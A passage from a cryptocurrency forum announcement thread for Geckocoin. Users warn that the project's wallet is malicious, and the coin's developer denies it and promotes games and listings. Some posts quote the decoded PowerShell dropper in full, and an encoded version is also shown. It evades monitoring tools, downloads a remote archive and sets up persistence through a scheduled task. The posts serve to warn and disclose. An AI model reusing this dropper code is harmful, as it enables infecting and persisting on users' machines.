IALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A | base64 -d


https://www.virustotal.com/gui/file/f41649a4cb6f167c66ef4e2252c3a50f2b3b8a8d6818580ca0e7d6dec2142ac9/behavior
https://www.virustotal.com/gui/file/7d8bb86d079e81b143f82ead0165f92170795228c06fcf1317e6d99972d90256/behavior

Not only is the windows wallet malicious, so are linux precompiled binares that drop files in /var/lib/fwupd/gnupg/ and /root/.dbus/session-bus/ and then try to set auto execute using /usr/bin/dbus-launch dbus-launch --autolaunch a39eb3ed78b7401fb6809ed0c562a5b1 --binary-syntax --close-stderr


So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet.
Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 02:49:48 PM
#40
https://twitter.com/elonmusk/status/1632060356930555904?s=20
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 02:43:50 PM
#39
Quote from: lijingang on March 05, 2023, 02:29:39 AM
As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.

There will be mods 1x1, 2x2, 4x4, 16x16. Like survival mode, it's every man for himself.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 02:25:33 PM
#38
Quote from: lijingang on March 05, 2023, 02:29:39 AM
As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.

We develop PVP games.
The commission will be deducted from the winner.
Half the commission to the team, half the commission will be burned.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 01:18:44 PM
#37
Quote from: madmartyk on March 12, 2023, 12:16:33 PM
From what I have seen on discord the trojan is in VKAX wallet.

That's right, but they are trying to blame us Grin
madmartyk
legendary
Activity: 2674
Merit: 1030
Yes I am a pirate, 300 years too late!
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 12:16:33 PM
#36
From what I have seen on discord the trojan is in VKAX wallet.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 12:14:40 PM
#35
Quote from: furcalor on March 11, 2023, 06:44:16 PM


Code:
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

Stop writing this lies everywhere, give video evidence, if you have any at all
madmartyk
legendary
Activity: 2674
Merit: 1030
Yes I am a pirate, 300 years too late!
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 10:25:31 AM
#34
Is there a cleaner for it?  I had it, deleted it all out.  If I start the Geckocoin wallet will it reinstall?
furcalor
jr. member
Activity: 59
Merit: 3
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 11, 2023, 06:44:16 PM
#33
Malicious wallet

https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/behavior
https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/detection

Geckocoin has malicious wallet that executes a powershell command that downloads malicious files and sets a scheduled job on the PC to run.
If you PC has %appdata%\LogState\ folder with jLherYu.vbs file or ws2help.exe you have been infected!

Decoded powershell with the malicious url removed below:

Code:
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}
lijingang
newbie
Activity: 99
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 05, 2023, 02:29:39 AM
#32
As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
February 27, 2023, 04:20:10 PM
#31
I announce a contest for the most original rules of the contest in the game GeckoMan.
the person whose idea we choose will win.
prize pool 100000GEC
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
February 23, 2023, 04:11:57 PM
#30
GEC has been listed on P2B with GEC/USDT pair
Enjoy your trading GEC\USDT
P2B announcements are posted
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
February 18, 2023, 02:43:15 PM
#29
So, we've been pretty busy lately with a new 2D game in development.

We thought about what the game should be like. We will tell you about it in the near future. In short, the game will be PvP, where you will fight with each other.

Wait for the announcement.📢
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
February 10, 2023, 02:48:14 PM
#28
The game works, accepts payment in GEC and BBC - https://geckoman.gecko.mn
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
February 10, 2023, 10:21:36 AM
#27
Geckomain is undergoing technical work, including adding support for BabaCoin (BBC).

Stay tuned for news on the next game soon.
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
January 30, 2023, 01:02:07 PM
#26
Our trading volume crossed the $3,000 mark for the first time
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
January 20, 2023, 01:50:45 PM
#25
Quote from: AmunRaEfect on January 20, 2023, 06:22:34 AM
Retro/"nostalgia" games can be a concept that appeals to both gamers who played, as children, and younger players. Gecko thus has a growth potential that other new coins don't have, but more games and promotion is needed.

One of the few new projects worth watching. 

Thanks, we're glad you like our idea.
There will be many games, it will take time to develop them.
AmunRaEfect
newbie
Activity: 2
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
January 20, 2023, 06:22:34 AM
#24
Retro/"nostalgia" games can be a concept that appeals to both gamers who played, as children, and younger players. Gecko thus has a growth potential that other new coins don't have, but more games and promotion is needed.

One of the few new projects worth watching. 
Gecko_mn
newbie
Activity: 39
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
January 17, 2023, 11:50:06 AM
#23
Quote from: kalel22 on January 15, 2023, 07:24:56 AM
you should work on Marketing for this Coin as the project is very promising with the "Games" concept! try to get in touch with computing Giants like Google, Microsoft and Amazon ...etc with the offer to integrate it in their systems for example... just an idea amongst many Grin. Just push it hard it's a good stuff!  Cool

Thank you, it's important for us to know what you think. You have very good ideas, but they are impossible to implement.
kalel22
newbie
Activity: 19
Merit: 0
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
January 15, 2023, 07:24:56 AM
#22
you should work on Marketing for this Coin as the project is very promising with the "Games" concept! try to get in touch with computing Giants like Google, Microsoft and Amazon ...etc with the offer to integrate it in their systems for example... just an idea amongst many Grin. Just push it hard it's a good stuff!  Cool
Pages:
Bitcoin Forum>Alternate cryptocurrencies>Announcements (Altcoins)
Jump to: